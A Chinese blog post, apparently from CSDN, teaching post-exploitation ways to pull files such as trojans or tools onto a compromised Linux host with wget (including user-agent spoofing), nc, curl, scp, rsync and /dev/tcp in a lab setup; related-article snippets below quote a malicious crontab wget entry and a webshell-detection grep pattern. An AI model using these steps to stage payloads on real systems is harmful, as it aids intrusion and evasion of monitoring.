linux 木马 目录下没有文件,后渗透系列之下载文件(Linux篇)

最新推荐文章于 2024-04-10 22:00:00 发布
最新推荐文章于 2024-04-10 22:00:00 发布
阅读量404 收藏 2
点赞数 1
文章标签: linux 木马 目录下没有文件

后渗透是指已对目标服务器有shell交互后的操作,通常包含权限维持、提权、内网渗透、一键拿域控。

本篇文章主要讲解后渗透准备工作——下载文件的方式,文件可以是木马、工具等等(任意文件皆可),为了方便演示,文件为test.txt。

准备工作

首先需要架设服务器,将要下载的文件部署在服务器上,笔者用的服务器为Kali Linux架设,ip地址是192.168.8.111,被控端是Centos,ip地址是192.168.8.112

5793c26ab734769a4aa38a401bd726d3.png

服务器端架设完成,后文会演示Linux许多的下载方法。

下载文件

Wget

用于从网络上下载文件的一个工具(Linux自带,Windows需要去官网下载安装,与我们下载直接违背,所以Windows篇并没有提)

使用方法:

第一种——普通下载

wget http://192.168.8.111/test/test.txt

b27cf7de0c10bac6fe7a0f74779e75fe.png

第二种——伪造UA下载

首先来看一下正常下载的UA

c9f852da00e9148ee07f2d831dfd01e5.png

删掉test.txt文件重新下载,输入命令:wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" http://192.168.8.111/test/test.txt

e06a4a1253eadefd7cadb26b144465d1.png

然后再查看Kali Linux的Wireshark捕获的数据包

1fd22911d89b072c720c4757b296c25e.png

可以看到成功修改掉UA,其实wget还有许多功能,不过对于被控机进行下载不需要太多方式,只需要简单的下载即可,而且wget只有后台下载时才会产生日志文件,可以说是Linux中的一个下载神器

NC

NetCat,功能很多就不介绍了,简要写下如何通过NC进行下载

使用方法:

Kali Linux端输入命令:nc -lvp 8888 < test.txt

c7789024f2217f1fd4e5d74971c0c6c2.png

Centos端输入命令:nc 192.168.8.111 8888 > test.txt

e626665a573eafa0e021dc6f08a90bad.png

会显示空白,其实已经传输完成了,另起终端就可以查看

2aa746939ec359f8e91dd02da32829c7.png

然后只需要终端nc就可以了,在Kali Linux端可以看到传输

2fcdd50ae3b31ffb556e484a7dd56fff.png

Curl

利用URL语法在命令行下工作的文件传输工具

使用方法:

Centos端输入命令:curl -O http://192.168.8.111/test/test.txt(注意:大写的o)

61de765b7a0efe14e4e062fc5a04824a.png

可以看到下载成功,curl的功能如同wget一样,也可以进行修改UA,这里就不再演示

SSH

建立在应用层基础上的安全协议,专为远程登录会话和其他网络服务提供安全性的协议

本次需要用到的是scp命令,scp是基于SSH登录进行安全的远程文件拷贝,所以需要确保SSH服务是正常运行的

输入命令:service sshd start

de9c7cf50c96b494cc75e51559baca04.png

可以看到是正常运行状态

使用方法:

第一种——本地复制到远程

在Kali Linx端输入命令:scp /var/www/html/test/test.txt root@192.168.8.112:/root

3b5a4c59836ce12ec84ea6a946bea5d9.png

第一次连接会询问无法检测远程主机的真实性,是否需要继续连接,输入yes即可,往后再次连接就不会询问

cc9c8c7a926d80acb450414c1c4ce251.png

第二种——将远程文件复制到本地

如果用Kali Linux做服务器的话,首先需要修改下配置文件(默认Kali Linx中SSH登录是禁用root用户的),输入命令:vim /etc/ssh/sshd_config,添加一条PermitRootLogin yes

113829f35e8fd4ccc11dd34fb7707ac0.png

然后重启服务即可

802b190eeb8b37b6d1a00a93dd99a941.png

然后在Centos端输入命令:scp root@192.168.8.111:/var/www/html/test/test.txt /root

7be9ca458f001927ab7dca4be70cf304.png

Rsync

Rsync是Linux系统中一个镜像备份工具,可以远程同步,文件复制,默认系统自带且运行

使用方法:

第一种——远程同步

在Kali Linux端输入命令:rsync -r /var/www/html/test (Kali Linux的目录)192.168.8.112:/var/www/html/(远程主机被同步的目录)

dc22c5cd73ab753a6e924ea7e900b680.png

在Centos端查看同步的目录

8c35c773d77452bcd6583562d9693842.png

可以看到整个目录都进行了同步

第二种——利用SSH

Kali Linux输入命令:rsync -av test.txt -e  ssh root@192.168.8.112:/root

4a2fd7a61c683705cbd703f6e00f1f45.png

-e选项可以指定命令,所以说实际上是用SSH做的传输

f13e8d9155225bc27e50223a0ee12d39.png

有趣的是Rsync还可以列出远程主机的目录,命令为:rsync 192.168.8.112:/var/www/html/,笔者曾在某项目驻场遇到过一台主机未授权访问Rsync,甚至可以直接进行同步,拿到一个高危

总结

可以说Linux的文件下载方式不是很多,当然也有一些其他方法笔者试验没有成功,比如通过cat test.txt > /dev/tcp/192.168.8.112/8888传输就没有成功,不过按照理论上是可行的。

weixin_30667487
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之无文件渗透简单使用-windows
Testfan_zhou的博客
06-17 670
文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存中执行,也让专家很难在系统重启之后到此恶意软件的踪迹。 在日常的渗透测试中,如果使用无文件渗透,那么也同样可以保证在执行恶意测试程序...
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 406
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
应急响应实战笔记——Linux实战:④ 盖茨木马
君逍遥o
04-10 684
Linux盖茨木马是一类有着丰富历史,隐藏手法巧妙,网络攻击行为显著的DDoS木马,主要恶意特点是具备了后门程序,DDoS攻击的能力,并且会替换常用的系统文件进行伪装。木马得名于其在变量函数的命名中,大量使用Gates这个单词。分析和清除盖茨木马的过程,可以发现有很多值得去学习和借鉴的地方。
文件渗透实验
一个码农的笔记
03-09 4327
文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
Linux 下一木马程序分享
系统运维
03-05 285
前几天公司服务器被添加了一木马恶意程序,该程序一运行便对外发起了大量的连接,导致整个内网瘫痪掉,该木马注入的方式非常简单,只是在Linux crond定时器里加入以下任务: [root@localhost tmp]# crontab -l * * * * * /root/.zxc &gt;/dev/null 2&gt;&amp;1 @weekly wget -q http://stab...
linux php木马下载,Linux shell快速查PHP木马
weixin_39645343的博客
03-19 173
一句话查 PHP 木马find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc|base64_decode|Create_Function|ob_start|pack|relset_UC_key" > /tmp/php.txtgrep...
Linux服务器安全分析与清除木马渗透
11-20
Linux服务器安全分析与清除木马渗透,安全很重要,学习人家的方法
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
PandaSniper:Linux C2框架demo,为期2周的“黑客编程马拉松”,从学习编程语言开始到实现一个demo的成果
03-20
熊猫狙击手Linux C2框架demo,为期2周的“黑客编程马拉松”,从学习编程语言开始到实现一个demo的成果。特别注意:此程序高度demo,请勿用于实际项目。但是我们会不定时更新,通过我们对这次新学的编程语言的更深入...
Linux特洛伊木马关键技术研究.pdf
12-09
Linux特洛伊木马关键技术研究.pdf 在校时下载的文档
Linux手动木马查杀过程
05-04
Linux手动木马查杀过程,处理安全问题很重要的,建议下载看看
windows反弹_渗透测试之无文件渗透简单使用windows
weixin_32285045的博客
01-30 149
有头发且有趣的码农万里挑一~125码农 | 有故事的程序员无文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存中执行,也让专家很难在系统重启之后到此恶意软件的踪迹。在日常的...
Linux文件渗透执行elf方式
SWX230162的博客
10-29 716
比如说你使用了一个开源组件,开源组件以bin的形式提供,但是你并不想直接./bin去运行它,而是想把开源bin直接集成到自己的代码中,这样对外相当于隐藏了开源bin,直接提供你自身代码的bin。这种场景可以简单应用到Linux elf in-memory execution这种方式。这个头文件中有两个变量bin, bin_len。bin中保存的就是bin的十六进制数据,bin_len是bin的data长度。将你依赖的开源bin通过xxd -i生成头文件。将头文件写到刚才创建的mem_fd中。
linux 病毒下载软件,Linux病毒和木马防护wmv视频教程
weixin_39922361的博客
05-03 168
入侵排查(1)首先我们要做的就是恢复一些我们常用的用来排查的工具,比如,ls,ps,netstat,lsof等命令。/root/chattr -i -a /bin/ps && rm /bin/ps -f #删除这些可能被感染的命令,比如ps,ls,netstat,lsof,top等。可以通过ls -lh /bin/ps 查看这些命令的大小和正常程序是否一致接下来可以一个相同...
linux搜索木马文件夹,Linux木马pscan2查与清除步骤
weixin_30070961的博客
04-30 167
一、现象AH现场的程序是分布式部署,除了程序的配置文件不同外,并无其他不同。最近地市sz频繁发生工单处理错误的故障,而其他地市运行一直很稳定。二、 因此,对sz的主机进行了检查,步骤如下:1、重启应用,发现应用的端口3456已经被占用,通过命令 lsof -i:3456 ,发现是用户tel的进程占用了该端口。2、通过命令ps,发现用户tel的进程熟非常多,但在我们的系统中,并未创建过用户tel。3...
利用Kali linux中的Dirbuster对网站进行渗透目录
WZY22502701的博客
10-20 2620
请自觉遵守网络安全法 1.进入kali linux,的Dirbuster 在URL中输入进行扫描的网站 工作方式选择自动切换 可以将Number of Threads的数值进行调节,在硬件允许的条件下‘ 在File with list of dirs/liles中到相应的字典进行爆破 导入相应的字典文件 选择开启的方式 标准和模糊两种模式 1标准状态 2模糊状态下需要设置变量 二者选一皆可 点击STart 即可完成 ...
[记录]Linux木马一记
immershy的专栏
10-13 2283
1.相关文章 http://news.drweb.com/show/?i=5801&lng=en
kali生成木马程序渗透linux系统
最新发布
05-24
Kali Linux 是一款专门用于网络安全测试和渗透测试的操作系统,它提供了许多工具来测试和攻击不同类型的系统和网络。其中,生成木马程序是一种常用的攻击方式。 首先,需要使用 Kali Linux 上的一个名为 Metasploit 的工具来生成木马程序。Metasploit 是一款开源的渗透测试框架,可以用于创建、测试和部署漏洞利用。 其次,需要了解目标系统的漏洞情况,选择合适的漏洞利用模块,并配置相关参数。利用 Metasploit 生成木马程序后,可以使用不同的方式进行部署和传播。 请注意,本人作为 CSDN 自主开发的 AI 助手,不提倡或支持任何非法行为和攻击行为。以上内容仅供学习和研究之用,请勿将其用于任何非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值